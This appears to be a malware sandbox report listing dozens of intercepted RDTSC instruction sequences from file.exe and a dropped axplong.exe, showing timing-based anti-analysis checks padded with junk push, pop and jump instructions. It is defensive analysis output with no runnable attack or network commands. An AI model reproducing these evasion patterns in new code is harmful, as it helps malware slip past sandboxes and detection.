                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC0CB8 second address: 4CC0D6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4ED8671h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FD4A4ED866Eh 0x0000000f push eax 0x00000010 jmp 00007FD4A4ED866Bh 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FD4A4ED8674h 0x0000001d and eax, 5CCF4E18h 0x00000023 jmp 00007FD4A4ED866Bh 0x00000028 popfd 0x00000029 pushfd 0x0000002a jmp 00007FD4A4ED8678h 0x0000002f jmp 00007FD4A4ED8675h 0x00000034 popfd 0x00000035 popad 0x00000036 mov ebp, esp 0x00000038 jmp 00007FD4A4ED866Eh 0x0000003d pop ebp 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007FD4A4ED8677h 0x00000045 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD01D4 second address: 4CD01D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD01D8 second address: 4CD01DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD01DE second address: 4CD01FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4C546A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov di, si 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD01FF second address: 4CD0246 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD4A4ED8678h 0x00000008 adc cx, 8FC8h 0x0000000d jmp 00007FD4A4ED866Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 call 00007FD4A4ED8676h 0x0000001c pop esi 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD0246 second address: 4CD0256 instructions: 0x00000000 rdtsc 0x00000002 mov bx, 18E6h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD0256 second address: 4CD025A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD025A second address: 4CD0260 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD0260 second address: 4CD029A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4ED8670h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FD4A4ED8670h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 jmp 00007FD4A4ED866Eh 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a pop ebx 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD029A second address: 4CD02F4 instructions: 0x00000000 rdtsc 0x00000002 mov di, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FD4A4C5469Bh 0x00000014 sbb ah, 0000002Eh 0x00000017 jmp 00007FD4A4C546A9h 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007FD4A4C546A0h 0x00000023 sbb si, 7BA8h 0x00000028 jmp 00007FD4A4C5469Bh 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD02F4 second address: 4CD0347 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FD4A4ED866Fh 0x00000008 pop eax 0x00000009 jmp 00007FD4A4ED8679h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push dword ptr [ebp+08h] 0x00000014 jmp 00007FD4A4ED866Eh 0x00000019 push 3CED9789h 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FD4A4ED866Ch 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD0347 second address: 4CD039B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD4A4C546A1h 0x00000008 pushfd 0x00000009 jmp 00007FD4A4C546A0h 0x0000000e jmp 00007FD4A4C546A5h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xor dword ptr [esp], 3CEC978Bh 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FD4A4C5469Dh 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD03C2 second address: 4CD03DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, di 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b movzx eax, al 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov eax, 590EB8E7h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD03DB second address: 4CD03E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD03E1 second address: 4CD040C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4ED8675h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD4A4ED866Dh 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1C974 second address: F1C998 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD4A4C546A9h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pop ecx 0x00000011 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 95F2E3 second address: 95F2E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: AE9C3E second address: AE9C44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: AE8FA4 second address: AE8FAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: AE8FAA second address: AE8FB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: AE8FB4 second address: AE8FB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: AE910E second address: AE9112 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: AE956F second address: AE957D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jne 00007FD4A4ED8666h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: AEAE9F second address: AEAEA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: AEAEA5 second address: AEAEE3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push esi 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pop esi 0x00000014 mov eax, dword ptr [eax] 0x00000016 push eax 0x00000017 jmp 00007FD4A4ED8674h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FD4A4ED866Ch 0x00000028 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: AEAEE3 second address: AEAEF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD4A4C546A0h 0x00000009 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: AEAF4E second address: AEAFCB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4ED8670h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007FD4A4ED8668h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 push 00000000h 0x00000028 jmp 00007FD4A4ED8677h 0x0000002d call 00007FD4A4ED8669h 0x00000032 jnc 00007FD4A4ED8678h 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FD4A4ED866Bh 0x00000040 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: AEAFCB second address: AEAFD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: AEAFD1 second address: AEAFFC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 jmp 00007FD4A4ED866Eh 0x00000018 popad 0x00000019 mov eax, dword ptr [eax] 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: AEAFFC second address: AEB001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: AEB001 second address: AEB075 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD4A4ED8670h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e jmp 00007FD4A4ED866Fh 0x00000013 pop eax 0x00000014 movsx edx, si 0x00000017 push 00000003h 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007FD4A4ED8668h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 00000018h 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 add dword ptr [ebp+122D25ADh], ebx 0x00000039 push 00000000h 0x0000003b mov edx, dword ptr [ebp+122D3972h] 0x00000041 push 00000003h 0x00000043 mov edi, esi 0x00000045 call 00007FD4A4ED8669h 0x0000004a pushad 0x0000004b push ebx 0x0000004c je 00007FD4A4ED8666h 0x00000052 pop ebx 0x00000053 push ecx 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: AEB075 second address: AEB0A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FD4A4C546A9h 0x00000018 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: AEB0A1 second address: AEB0B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD4A4ED8670h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: AEB0B6 second address: AEB0C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: AEB0C4 second address: AEB0C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: AEB183 second address: AEB236 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FD4A4C546A9h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add dword ptr [esp], 07F38B51h 0x00000012 pushad 0x00000013 jl 00007FD4A4C5469Ch 0x00000019 mov esi, dword ptr [ebp+122D3A46h] 0x0000001f mov edx, dword ptr [ebp+122D1C2Fh] 0x00000025 popad 0x00000026 push 00000003h 0x00000028 mov di, B704h 0x0000002c push 00000000h 0x0000002e mov dword ptr [ebp+122D25F3h], ebx 0x00000034 push 00000003h 0x00000036 or ecx, 60972FFDh 0x0000003c call 00007FD4A4C54699h 0x00000041 push esi 0x00000042 push edx 0x00000043 jmp 00007FD4A4C546A1h 0x00000048 pop edx 0x00000049 pop esi 0x0000004a push eax 0x0000004b jnl 00007FD4A4C5469Ch 0x00000051 mov eax, dword ptr [esp+04h] 0x00000055 pushad 0x00000056 push ecx 0x00000057 jnp 00007FD4A4C54696h 0x0000005d pop ecx 0x0000005e push esi 0x0000005f jo 00007FD4A4C54696h 0x00000065 pop esi 0x00000066 popad 0x00000067 mov eax, dword ptr [eax] 0x00000069 jc 00007FD4A4C546A3h 0x0000006f jmp 00007FD4A4C5469Dh 0x00000074 mov dword ptr [esp+04h], eax 0x00000078 pushad 0x00000079 push eax 0x0000007a push edx 0x0000007b jo 00007FD4A4C54696h 0x00000081 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: AEB236 second address: AEB27E instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD4A4ED8666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FD4A4ED8675h 0x0000000f popad 0x00000010 pop eax 0x00000011 movzx esi, ax 0x00000014 lea ebx, dword ptr [ebp+1245FD9Dh] 0x0000001a mov edx, dword ptr [ebp+122D3962h] 0x00000020 xchg eax, ebx 0x00000021 jmp 00007FD4A4ED8670h 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: AEB27E second address: AEB296 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4C546A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: AEB296 second address: AEB2A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FD4A4ED8666h 0x0000000a rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: AEB35D second address: AEB39A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007FD4A4C546A7h 0x0000000e popad 0x0000000f popad 0x00000010 mov eax, dword ptr [eax] 0x00000012 jmp 00007FD4A4C5469Fh 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push esi 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 pop esi 0x00000021 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: AEB39A second address: AEB3A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FD4A4ED8666h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80337 second address: 4C80346 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4C5469Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80346 second address: 4C8034C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C8034C second address: 4C80350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80350 second address: 4C80354 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80354 second address: 4C803A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push FFFFFFFEh 0x0000000a jmp 00007FD4A4C546A7h 0x0000000f push 31C9C541h 0x00000014 pushad 0x00000015 mov ax, bx 0x00000018 mov eax, edx 0x0000001a popad 0x0000001b xor dword ptr [esp], 46880559h 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FD4A4C546A6h 0x00000029 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C803A0 second address: 4C803A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C803A6 second address: 4C803AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C803AA second address: 4C80468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 3D660330h 0x0000000d pushad 0x0000000e mov edx, ecx 0x00000010 push ecx 0x00000011 pushfd 0x00000012 jmp 00007FD4A4ED8677h 0x00000017 xor esi, 199EAC8Eh 0x0000001d jmp 00007FD4A4ED8679h 0x00000022 popfd 0x00000023 pop esi 0x00000024 popad 0x00000025 xor dword ptr [esp], 4A5EAD30h 0x0000002c jmp 00007FD4A4ED8677h 0x00000031 mov eax, dword ptr fs:[00000000h] 0x00000037 jmp 00007FD4A4ED8676h 0x0000003c nop 0x0000003d jmp 00007FD4A4ED8670h 0x00000042 push eax 0x00000043 pushad 0x00000044 mov ecx, 53F879F3h 0x00000049 popad 0x0000004a nop 0x0000004b jmp 00007FD4A4ED8676h 0x00000050 sub esp, 1Ch 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80468 second address: 4C8046C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C8046C second address: 4C80489 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4ED8679h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80489 second address: 4C804DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD4A4C546A3h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007FD4A4C546A6h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FD4A4C5469Ch 0x0000001b or ah, 00000018h 0x0000001e jmp 00007FD4A4C5469Bh 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C804DA second address: 4C804E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD4A4ED866Bh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C804E9 second address: 4C805B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4C546A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007FD4A4C5469Eh 0x00000011 xchg eax, esi 0x00000012 pushad 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FD4A4C5469Ch 0x0000001a add al, 00000008h 0x0000001d jmp 00007FD4A4C5469Bh 0x00000022 popfd 0x00000023 mov eax, 080DA87Fh 0x00000028 popad 0x00000029 pushfd 0x0000002a jmp 00007FD4A4C546A4h 0x0000002f jmp 00007FD4A4C546A5h 0x00000034 popfd 0x00000035 popad 0x00000036 push eax 0x00000037 pushad 0x00000038 mov ecx, edx 0x0000003a mov edx, 64207FAEh 0x0000003f popad 0x00000040 xchg eax, esi 0x00000041 jmp 00007FD4A4C546A5h 0x00000046 xchg eax, edi 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a jmp 00007FD4A4C546A3h 0x0000004f call 00007FD4A4C546A8h 0x00000054 pop ecx 0x00000055 popad 0x00000056 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C805B9 second address: 4C80605 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4ED8670h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov dh, CEh 0x0000000d pushad 0x0000000e mov bl, ah 0x00000010 jmp 00007FD4A4ED8675h 0x00000015 popad 0x00000016 popad 0x00000017 xchg eax, edi 0x00000018 jmp 00007FD4A4ED866Eh 0x0000001d mov eax, dword ptr [7743B370h] 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80605 second address: 4C80609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80609 second address: 4C8060D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C8060D second address: 4C80613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80613 second address: 4C80663 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4ED8674h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [ebp-08h], eax 0x0000000c jmp 00007FD4A4ED8670h 0x00000011 xor eax, ebp 0x00000013 pushad 0x00000014 mov edi, 5E25ABA2h 0x00000019 popad 0x0000001a nop 0x0000001b jmp 00007FD4A4ED8674h 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80663 second address: 4C80669 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80669 second address: 4C8066E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C8066E second address: 4C806BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FD4A4C5469Bh 0x0000000a sbb ah, FFFFFFFEh 0x0000000d jmp 00007FD4A4C546A9h 0x00000012 popfd 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 nop 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FD4A4C546A8h 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C806BB second address: 4C806C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C806C1 second address: 4C80710 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-10h] 0x0000000b pushad 0x0000000c jmp 00007FD4A4C5469Bh 0x00000011 mov bh, ah 0x00000013 popad 0x00000014 mov dword ptr fs:[00000000h], eax 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FD4A4C546A1h 0x00000021 add ax, 8AF6h 0x00000026 jmp 00007FD4A4C546A1h 0x0000002b popfd 0x0000002c push eax 0x0000002d push edx 0x0000002e mov bx, cx 0x00000031 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80710 second address: 4C80714 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
